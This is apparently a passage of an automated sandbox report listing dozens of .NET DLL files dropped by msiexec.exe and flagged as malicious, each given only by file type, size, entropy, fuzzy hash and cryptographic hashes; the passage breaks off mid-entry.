                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.717541563928021
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 16144
Entropy (8bit): 6.734500709043853
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 15624
Entropy (8bit): 6.8012541413925405
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 1130656
Entropy (8bit): 6.715905432836471
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 16144
Entropy (8bit): 6.766244200871325
Encrypted: false
Malicious: true
Reputation: unknown
Process: C:\Windows\System32\msiexec.exe
File Type: PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 33592
Entropy (8bit): 6.486828889454643
Encrypted: false
Malicious: true
Reputation: unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.723329527099039
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:mEKi0jWhGCWefYA6VFHRN7P178FDR9z7Wxs:7KtCfFCld0l9z6s
                                                                                                                                                                                                                                                                                                                                  MD5:4564A146B250C1C73E59A6FED69FCA60
                                                                                                                                                                                                                                                                                                                                  SHA1:A9645B6D15EF8799AB5C0FA1D09FD5D01DFC3291
                                                                                                                                                                                                                                                                                                                                  SHA-256:F2DF432950E7751EA35A19C078376A7FEA079E739AD89C1A63CC45B41A07D18F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D3A6B078FDEEB3492B20B442504CD743F84D08DD987E916F768B1222DFF81C73B4B7F72C1F8623695164A9715FC3C1E18ADF1EC2C5C877F54ACBF060ED4E2270
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15624
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.782820861043016
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:WeP4MKrW4N3WmYA6VFHRN7RKVXC4deR9zVjx93:WM4MetFClRKVXC4dC9zVjn3
                                                                                                                                                                                                                                                                                                                                  MD5:1F4727345E2C6782DFBAADC9E9817693
                                                                                                                                                                                                                                                                                                                                  SHA1:F467E2BC1F7D1DE3FAEDC953DC8EC8707B3E9268
                                                                                                                                                                                                                                                                                                                                  SHA-256:4818E3F1CAD2A5B47078C068AB08DC0DFF4110FDC8B525A99523C3D0789BC75A
                                                                                                                                                                                                                                                                                                                                  SHA-512:B925E8166F9E8AB1FA3719FD95E792AD725C427818144E3012C27BD251B4BD109A7447F862D886017CE323FCB815EA7E02B73A4865FCDEC00D457EA51CC5CD17
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16176
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.777064915062182
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:LJMER3xxBRvWVxzWteWxNzx95jmHnhWgN7aIW5z45WXYz1X01k9z3AyoFewPe7:OmhLRvWVxzWtlX6HRN7moJR9z/Ke7
                                                                                                                                                                                                                                                                                                                                  MD5:8245CEBD42F6DDE00034133DD1E618B6
                                                                                                                                                                                                                                                                                                                                  SHA1:80A448FFBF1B6DD0FD033AA925D8793B440C486F
                                                                                                                                                                                                                                                                                                                                  SHA-256:ED43F130E2E71AE9C4160D887BDD004105E34B0D353DAFF1F12F7DE7CEFF6737
                                                                                                                                                                                                                                                                                                                                  SHA-512:B8202FDF61803A2C6A071D68F6AD9E0F153E54745044EC298505EED852DF25140992C4FF753C1E8E8FF42AB0FDDFC8D846E1EA1438295C4FD5C83A563663CB5C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):45320
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.5512339771396775
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:6l7vatyqsSfySDzEjI7uG8lZ6KFClfFT9zSG:6JQHjnz+YuGUZifTzSG
                                                                                                                                                                                                                                                                                                                                  MD5:C2406CEA76D202D405D811A647685BCE
                                                                                                                                                                                                                                                                                                                                  SHA1:3CDA5B4AFE38FFD978DCDFE9F06E71BB4A27E458
                                                                                                                                                                                                                                                                                                                                  SHA-256:9146D7B97ED2B0D1BFDA6F75E508A1E4D171ACFFA75D9F061294AA0E64D8D93D
                                                                                                                                                                                                                                                                                                                                  SHA-512:BC74AA88385C1E679FE3D93240B271774D1623060D1A42B66D5CA2D0617268FA0B40278A13D45E3978461CB5A5ED2E6B358643CAE8636D2D05FD5F971C39C66F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22800
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.425734217683911
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:DWgi2WkbXPPGmmOWWWfnpon0YA6VFHRN77Zm9R9zrJRU2:6sHGmmHPFCl7M9zs2
                                                                                                                                                                                                                                                                                                                                  MD5:5EF80C5A289DB81C062B66908A2C6B9F
                                                                                                                                                                                                                                                                                                                                  SHA1:CF799B59D6CD69890592F42238F14337EFBE3B48
                                                                                                                                                                                                                                                                                                                                  SHA-256:C47A7B97F2026DACFC4B5C866429513E10D2C3C39201420E1C3A5624927E706C
                                                                                                                                                                                                                                                                                                                                  SHA-512:CFA3711F94F5291CE9F30EDB8DBA0BFD7C9D219327180F11D597113B997A0DF5EB76E2E2BF7F82F99B5C96B7D027D5E5C50365646DF01FD5C47B1FDF5B7B35E6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20232
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.598667978987244
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MWspLW2LIrR/TvnaNEcv2YA6VFHRN7eCVCEpcR9zURG:4RLq/TvnaNwFCleCVCEpw9zx
                                                                                                                                                                                                                                                                                                                                  MD5:1EC59746C207B75224D1C170AB65D5D9
                                                                                                                                                                                                                                                                                                                                  SHA1:106EF6FB34DC9B2555A8723603828ADB736A312D
                                                                                                                                                                                                                                                                                                                                  SHA-256:3526B82CFB921E84C749DC54976503441D09FD36F569A0D574FB6819510AB7CA
                                                                                                                                                                                                                                                                                                                                  SHA-512:1DC5606DC607A349DB6A462D317CFCFAEC5D0444479FBC2B8C7F01D2E0E2443711C2E9DD0FAE7A702FB27ADA10DB52CFCDF2D5D7AA4C704911CC4B11516DF829
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18192
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.628514917253588
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:c5y7UByGe9xCEV6mW8/NWMYA6VFHRN7/5FDR9z7WGM:saUByGePrVFClTl9zq
                                                                                                                                                                                                                                                                                                                                  MD5:C692B087C3167E7263397E9B34E94332
                                                                                                                                                                                                                                                                                                                                  SHA1:105D78B07E06E1C28AB69DC7E8CF4A7F6A71AFC3
                                                                                                                                                                                                                                                                                                                                  SHA-256:59692C49D72030F5259052EFAC5BD88BC2D3471450D3F081D64F1E60E2C502E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:8484AF16073C9CDE88E67BECBE2C1C126FC4761323C7A2AD71D869447649A8529D23A3CB779F34E1FE388A0004BD9FEC4B801E1FBB8B527BC39BAC97AE48C2E7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15632
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.822445014968599
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:NHx15LTIWASmWOpWjA6Kr4PFHnhWgN7agWyA8RwX01k9z3AeJRf/R6Lv:NR15LTIWASmWOYA6VFHRN7a9R9zrJRw
                                                                                                                                                                                                                                                                                                                                  MD5:80FC1F4FCBAEBFB32BC62687AB95A9BD
                                                                                                                                                                                                                                                                                                                                  SHA1:C20C3D1039A0B374393694CF0A7921B3FFB54161
                                                                                                                                                                                                                                                                                                                                  SHA-256:6DE0F580DBCCB63C2B6053AC81CDAFD7FDF5C8A1B177D336DD75D9E1DD176E0D
                                                                                                                                                                                                                                                                                                                                  SHA-512:B4E8AED6A8F81F3E7DD206FCCF06BE65E6186700CCDCBD741B08172AE7D6F74EDF2241E59AFDFDCA212DC5AE01B5399AF79F150D4BFDC0D8784714DC930CA133
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32008
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.450786767544824
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:JYWHcUWW2i5ctERQXIG6KMWFYpmGRIOBB/rSYA6VFHRN792R9zza+X:Jm8SAKMWFkmGakB2FCl9K9zL
                                                                                                                                                                                                                                                                                                                                  MD5:25B91230BE0B6D4FAC1B999ECF8FC76C
                                                                                                                                                                                                                                                                                                                                  SHA1:2D943785738A21D9C2026726C8500A606E022D8E
                                                                                                                                                                                                                                                                                                                                  SHA-256:1A536B20C7FD07A4B156C6C68048AAB24BDDC19786C98704E7EF11FBDDACCA0C
                                                                                                                                                                                                                                                                                                                                  SHA-512:B3AAE1F551B4CE642BF5B347F35186A1F7B8BE08F4F186971FB3D99991C24E5F04BDBFC70EF4A46DB87A420C95ED9E3C1AE0A7B893D5C7B5CF9A5193B1D4D64F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):51984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.480267391585499
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:sBfoK6fKUINsWW/z2rg8Z61rvZqhwFLXFMjKYuPt3FClT9zL:sBfoWUINcz2r1GqhwFLFMjKPPt1i5zL
                                                                                                                                                                                                                                                                                                                                  MD5:88512250F0E7ED903BFA2A457CCFBE9F
                                                                                                                                                                                                                                                                                                                                  SHA1:9020853BFD6C297AFCECDD12AF6014A57111DE7A
                                                                                                                                                                                                                                                                                                                                  SHA-256:BDA3738F6C45B50862D09DDE795B4FD27E31815DDC8918A16F63B2C4BACA5FB2
                                                                                                                                                                                                                                                                                                                                  SHA-512:B4419F8431B756B4262195013068E4E851A17B49972C9E3112BAF2C22EDF795E82C614A4B2BBA0613E60E873FC8093EA302E18F68B8E85FFB3504D04A9DBEAA9
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.677337531505305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:tTBV9nrJAlvWmpLWNpWjA6Kr4PFHnhWgN7agWySnE8RwX01k9z3AeJR7oA5k:D1QvWmpLWNYA6VFHRN7+E9R9zrJR7o7
                                                                                                                                                                                                                                                                                                                                  MD5:514CEF61159B16DE1FDAED7056A3E0D9
                                                                                                                                                                                                                                                                                                                                  SHA1:7ED1FB6A569A7C9E8507876A094334CF9F3B0969
                                                                                                                                                                                                                                                                                                                                  SHA-256:A421933A4B9EEA4170EE68EF1754DBA590970599CA2F5B52F92DE7B0DC2769AF
                                                                                                                                                                                                                                                                                                                                  SHA-512:4450BB36331EF7B9F08F7527E3C3509393CBD58CAA27B1BDD877204CF0934C684CB78D81231B94868524AC5F031AC3E8DF234F55567CDF54691510CB2184D6BE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.727108508133854
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:UW0SQaRxxocuW5yGWLpWjA6Kr4PFHnhWgN7acW66NqPY00pyEuX01k9z3AL68ZIR:UUQW6JW5yGWLYA6VFHRN7fEpcR9zUU/
                                                                                                                                                                                                                                                                                                                                  MD5:2724E3263871899F2684D8B2432A370C
                                                                                                                                                                                                                                                                                                                                  SHA1:F5A9EDDFFC2BF60D77BB194BBDBB6CDF5D353A52
                                                                                                                                                                                                                                                                                                                                  SHA-256:69F2DA7C2A3EA6F0C742EBBDD422ECE10D050B982424773C9E07368E06401592
                                                                                                                                                                                                                                                                                                                                  SHA-512:329DF6407F7A69F85318D656092A5F78C78ACCA8F998290DBCB159E4D7E9F8616939E91536A94606F71DFDFD75B2E410D07CABB8D4B018F9A3122140DF1263A6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):221960
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.872789919122551
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:d1Bg53qlzkOGjMD1jUZVEJrSALXuDcWro1CS:jBgxqlz1GgDRKVEJOIuDcWcCS
                                                                                                                                                                                                                                                                                                                                  MD5:C1D83BB993CA11B212B0B44576DD31E3
                                                                                                                                                                                                                                                                                                                                  SHA1:E819306131C8FDEB9CF89DDB0C9DAAA5B517BF22
                                                                                                                                                                                                                                                                                                                                  SHA-256:CD2F87FC4EA7F88B52EB8521EDE7D36B80BB329FAA8DE163BC0C0491832D0F74
                                                                                                                                                                                                                                                                                                                                  SHA-512:29D3EA8C257893095C6B076F1F17D903A74EF7E7AD4AE52C87B7746168BEAB1D828D2EEB037FC1AF76C5CBC2A61629F04873248A96456340EFDAB1EE96341692
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):322824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.695090576962379
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:5vZzvy5t66x3yEHAc1mZdOqZYqdKfR8wwWRwG/Y14CFYHQ9B7B:/vSiEHAc1mZ4q0uRawG+dz9B7B
                                                                                                                                                                                                                                                                                                                                  MD5:025DB3101A59BB29AFE8FCDC33D5590A
                                                                                                                                                                                                                                                                                                                                  SHA1:0AB913D0EEDAB18146897D866EBF785C78681439
                                                                                                                                                                                                                                                                                                                                  SHA-256:B7BA1AA2D0276DEDA176C1AD572C3C4FAD224FFCFEFC045896B52AD730673EB7
                                                                                                                                                                                                                                                                                                                                  SHA-512:3E3B9CE99C4BAC8E4B00C38E93DE59EAFBD0651F03A5E25E51916D399318B958FDCAF95AB961688C1318E117727E1D12EA2C43F0EBF79E4E0126CB3B113B924C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16136
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.730609288657777
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kB9qNyVWbuPdB5W2YA6VFHRN7wYVMR9z2vn/:iayWudBzFClwv9zwn/
                                                                                                                                                                                                                                                                                                                                  MD5:686CD3BE26B4649484D56031B21627FC
                                                                                                                                                                                                                                                                                                                                  SHA1:4CE1F71FBCFAEE92A0D38F32BCACE1C4D077A488
                                                                                                                                                                                                                                                                                                                                  SHA-256:069AFF3EC1D53B0A2255DE6243A057E9B00AC6D01479F35382B2B16BB57A23A2
                                                                                                                                                                                                                                                                                                                                  SHA-512:9596C529CD67B37E7CBEEA03496B17DF4CD56D2519AB715D57290EADDA16D8CF72CD9F7A5E18AE10CA5787B856667BB9B05EC636C88DF1B4D8EEE2163FC3017D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):28944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.471330473213999
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MHWFIBJBrW8trwhWKH0sdznMbKF+87makO2akSMHHDHEHsObEruYA6VFHRN7HqR4:MqCJBZtrelWW+8d8KnFClHG9ze
                                                                                                                                                                                                                                                                                                                                  MD5:A1968D6A862286C05F86EAC22F21B8C3
                                                                                                                                                                                                                                                                                                                                  SHA1:D23A410A8A4450EACE5AA230E088ACEB6743B29C
                                                                                                                                                                                                                                                                                                                                  SHA-256:938F43DB59DBED4F306492750DF1CA32B2F5F487AC00F1DCCF27830231F2DCB6
                                                                                                                                                                                                                                                                                                                                  SHA-512:8060EC092E97041AEC48E9F23BD27F8E8555161A74C213E182104E65F2B80E2285EB73F6A69EA4BFD8903936C59F958DE2F48AE297AF66942C6BE861B9C27DF6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.762030084243297
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:guYklmI8N5vBRMWsB4BBgWGYA6VFHRN72kFDR9z7WsKkR:OklmI8N55Ri6BBEFCldl9zn
                                                                                                                                                                                                                                                                                                                                  MD5:53330C1C8FD918CA2141C0039D72BC1B
                                                                                                                                                                                                                                                                                                                                  SHA1:51B86E844A3655398ED9DE18D7490429BB0F1E6E
                                                                                                                                                                                                                                                                                                                                  SHA-256:0F8A0BCEFBC1F0E854CFCDBA028C53C8D658B3CAA26706DE6D1BC89A92CB4C22
                                                                                                                                                                                                                                                                                                                                  SHA-512:D4F1CA15CE03EC02BD009B0D5E03612AF2C34C19E8D50F2CFE39C6CFD9C7D687CC95292F5A5548A11C7ECB3339BA816659BE535B6403B2F3BC955E8587DAE199
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):17672
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6341633149040415
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:y6EvDj8NluLWgMM4BHWdYA6VFHRN7J/ecTR9z6Dw/:y6EvDj8NsPP4BGFClVzV9z2W
                                                                                                                                                                                                                                                                                                                                  MD5:C68962D082AF9B2AA66574EB7CC19E32
                                                                                                                                                                                                                                                                                                                                  SHA1:EB28F7AE0ADAB40F950098E6AC4C24EFA7A16031
                                                                                                                                                                                                                                                                                                                                  SHA-256:62C5827EB74A101342D3C02EC909B6F9F2CEF8C871A21AF93129BDAA16003EB7
                                                                                                                                                                                                                                                                                                                                  SHA-512:99BB410F23E4FD2AD46F8ECAE38C881BBAB0A6252DEFB25EB53CFF659323586A28B269B1061B04E23D0433F4E62D8E4A5260C0E80DF5C79A6DC19C137E06B4C7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):42768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.818262385725449
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:YBV0jdpFKYl5f4bGRi2xVbcVT4p8JOaFCl6l9zPh:kedGYl5f4bGR3G04OWi63zZ
                                                                                                                                                                                                                                                                                                                                  MD5:B515896FEB8F4B378E9F6FEE22F5F1E6
                                                                                                                                                                                                                                                                                                                                  SHA1:348411DE58A4156B649EE9C6277B2735D88345D5
                                                                                                                                                                                                                                                                                                                                  SHA-256:6B9AF60B2B7947B7B960EF3012ADC7A81E5ACF6E990BC3FE6AF51CB13E07F91C
                                                                                                                                                                                                                                                                                                                                  SHA-512:9889D61E5F03A59B54E80D2DB49606D13DD5AFCF45E0EAEA4EFD34BF46C66FE30780A68DBD920C0C1424855AC51F62DD836D010902573113C8E93869DB6A9C09
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):215336
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.694443379581404
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:LcFFAFBS7nsE9WXBeAJRAipIx7kgmlZnFW2iBeVICTiupU8TVUnVZ5PDMXZoKcQf:K7sE9kesRA2imlZo2XZcn3m
                                                                                                                                                                                                                                                                                                                                  MD5:9845B4D023FABDEFCFECDA062FC68781
                                                                                                                                                                                                                                                                                                                                  SHA1:DF17714A108EE4E81F8E0B32F3AECEA03ACB9157
                                                                                                                                                                                                                                                                                                                                  SHA-256:57F85C61E832FD5DDB91A3C161939CD8DB72A8A6DE449A83F5C3070E6DACF48D
                                                                                                                                                                                                                                                                                                                                  SHA-512:49F186BD9DA01A378D9DCB1D9EF575A653B0A6779F3196FE318E6C47661857BF2A15231B0FB552014D1F3DB7F04AB990B344DC7F354711ECB1321FE40BE16786
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):94480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.450155185151261
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:vv1N9Mf5d/pMIJ7nZUyOuX3Gpafbqb9/8kGOQwQ7rzUU3q2bP6vOVFp6i/3zi:vNnMf5dhbJ3OuX3GpEbq5hOVys3m
                                                                                                                                                                                                                                                                                                                                  MD5:4CD484994224EC26CC86A61743DBFE6B
                                                                                                                                                                                                                                                                                                                                  SHA1:1BE9B7AA319B5F20FCA74C98BF57758FF7FCEDB6
